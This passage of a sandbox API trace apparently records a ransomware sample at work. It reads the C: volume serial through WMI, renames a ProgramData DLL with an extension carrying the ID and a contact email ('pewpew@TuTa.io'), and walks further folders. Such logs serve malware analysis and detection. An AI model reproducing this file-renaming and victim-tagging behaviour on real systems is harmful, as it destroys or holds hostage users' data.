Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f004 | out: ppvObject=0x691f004*=0xb5b4f4) returned 0x0 [0197.188] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b4f4, pProxy=0x60335dc, pAuthnSvc=0x691f054, pAuthzSvc=0x691f050, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c, pImpLevel=0x691f03c, pAuthInfo=0x691f040, pCapabilites=0x691f044 | out: pAuthnSvc=0x691f054*=0xa, pAuthzSvc=0x691f050*=0x0, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c*=0x6, pImpLevel=0x691f03c*=0x2, pAuthInfo=0x691f040, pCapabilites=0x691f044*=0x1) returned 0x0 [0197.188] WbemLocator:IUnknown:Release (This=0xb5b4f4) returned 0x1 [0197.188] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff8 | out: ppvObject=0x691eff8*=0xb5b514) returned 0x0 [0197.188] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff4 | out: ppvObject=0x691eff4*=0xb5b4f4) returned 0x0 [0197.188] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b4f4, pProxy=0x60335dc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0197.188] WbemLocator:IUnknown:Release (This=0xb5b4f4) returned 0x2 [0197.188] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x1 [0197.188] CoTaskMemFree (pv=0xbd4a38) [0197.188] WbemLocator:IUnknown:Release (This=0x6027910) returned 0x0 [0197.188] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ebf4 | out: ppvObject=0x691ebf4*=0xb5b514) returned 0x0 [0197.189] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ebb0 | out: ppvObject=0x691ebb0*=0x0) returned 0x80004002 [0197.190] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691e9cc | out: ppvObject=0x691e9cc*=0x0) returned 0x80004002 [0197.190] WbemLocator:IUnknown:AddRef (This=0xb5b514) returned 0x3 [0197.190] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e50c | out: ppvObject=0x691e50c*=0x0) returned 0x80004002 [0197.191] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e4bc | out: ppvObject=0x691e4bc*=0x0) returned 0x80004002 [0197.191] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e4c8 | out: ppvObject=0x691e4c8*=0xb5b474) returned 0x0 [0197.191] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b474, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e4d0 | out: pCid=0x691e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.191] WbemLocator:IUnknown:Release (This=0xb5b474) returned 0x3 [0197.191] CoGetContextToken (in: pToken=0x691e528 | out: pToken=0x691e528) returned 0x0 [0197.191] CoGetContextToken (in: pToken=0x691e930 | out: pToken=0x691e930) returned 0x0 [0197.191] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9c0 | out: ppvObject=0x691e9c0*=0xb5b4fc) returned 0x0 [0197.191] WbemLocator:IRpcOptions:Query (in: This=0xb5b4fc, pPrx=0xb5b514, dwProperty=2, pdwValue=0x691e9e8 | out: pdwValue=0x691e9e8) returned 0x80004002 [0197.191] WbemLocator:IUnknown:Release (This=0xb5b4fc) returned 0x3 [0197.192] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x2 [0197.192] CoGetContextToken (in: pToken=0x691ef08 | out: pToken=0x691ef08) returned 0x0 [0197.192] CoGetContextToken (in: pToken=0x691ee68 | out: pToken=0x691ee68) returned 0x0 [0197.192] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x691ef38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x691ef34 | out: ppvObject=0x691ef34*=0x60335dc) returned 0x0 [0197.192] WbemLocator:IUnknown:AddRef (This=0x60335dc) returned 0x4 [0197.192] WbemLocator:IUnknown:Release (This=0x60335dc) returned 0x3 [0197.192] WbemLocator:IUnknown:Release (This=0x60335dc) returned 0x2 [0197.192] SysStringLen (param_1=0x0) returned 0x0 [0197.192] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x691f2cc | out: puCount=0x691f2cc*=0x0) returned 0x0 [0197.192] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f2c8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2c8*=0x20, pszText=0x0) returned 0x0 [0197.192] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f2c8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2c8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.192] CoGetContextToken (in: pToken=0x691ef38 | out: pToken=0x691ef38) returned 0x0 [0197.192] WbemLocator:IUnknown:AddRef (This=0xb5b514) returned 0x3 [0197.192] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691edcc | out: ppvObject=0x691edcc*=0xb5b514) returned 0x0 [0197.192] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x3 [0197.192] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x2 [0197.192] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f2d0*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d0*=0x20, pszText=0x0) returned 0x0 [0197.192] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f2d0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.192] IWbemServices:GetObject (in: This=0x60335dc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x691f284*=0x0, ppCallResult=0x0 | out: ppObject=0x691f284*=0x6028648, ppCallResult=0x0) returned 0x0 [0197.474] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x691f284 | out: puCount=0x691f284*=0x2) returned 0x0 [0197.474] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x691f280*=0x0, pszText=0x0 | out: puBuffLength=0x691f280*=0xf, pszText=0x0) returned 0x0 [0197.474] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x691f280*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f280*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.474] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3600cb0*=0, plFlavor=0x3600cb4*=0 | out: pVal=0x691f280*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3600cb0*=8, plFlavor=0x3600cb4*=0) returned 0x0 [0197.474] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.474] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.474] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3600cb0*=8, plFlavor=0x3600cb4*=0 | out: pVal=0x691f288*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3600cb0*=8, plFlavor=0x3600cb4*=0) returned 0x0 [0197.474] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.474] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.474] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll", lpFilePart=0x0) returned 0x30 [0197.474] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x53 [0197.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2e8) returned 1 [0197.474] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), fInfoLevelId=0x0, lpFileInformation=0x691f364 | out: lpFileInformation=0x691f364*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd582ef5d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd582ef5d, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x2ecf1a40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0197.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2e4) returned 1 [0197.475] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), lpNewFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0197.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0197.475] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Media Player", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Media Player", lpFilePart=0x0) returned 0x25 [0197.475] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Media Player\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Media Player\\", lpFilePart=0x0) returned 0x26 [0197.475] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Media Player\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.476] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.476] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0197.476] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0197.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0197.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0197.476] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Media Player", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Media Player", lpFilePart=0x0) returned 0x25 [0197.476] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Media Player\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Media Player\\", lpFilePart=0x0) returned 0x26 [0197.477] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Media Player\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.477] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.477] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0197.477] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0197.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0197.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0197.477] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\MF", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\MF", lpFilePart=0x0) returned 0x1b [0197.477] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\MF\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\MF\\", lpFilePart=0x0) returned 0x1c [0197.477] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\MF\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.478] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.478] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Active.GRL", cAlternateFileName="")) returned 1 [0197.478] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pending.GRL", cAlternateFileName="")) returned 1 [0197.478] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0197.478] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0197.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0197.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0197.479] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\MF", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\MF", lpFilePart=0x0) returned 0x1b [0197.479] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\MF\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\MF\\", lpFilePart=0x0) returned 0x1c [0197.479] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\MF\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.479] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.479] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Active.GRL", cAlternateFileName="")) returned 1 [0197.479] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pending.GRL", cAlternateFileName="")) returned 1 [0197.480] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pending.GRL", cAlternateFileName="")) returned 0 [0197.480] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0197.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0197.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0197.480] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\MSDN", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\MSDN", lpFilePart=0x0) returned 0x1d [0197.480] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\MSDN\\", lpFilePart=0x0) returned 0x1e [0197.480] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.481] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.481] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8.0", cAlternateFileName="")) returned 1 [0197.481] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, 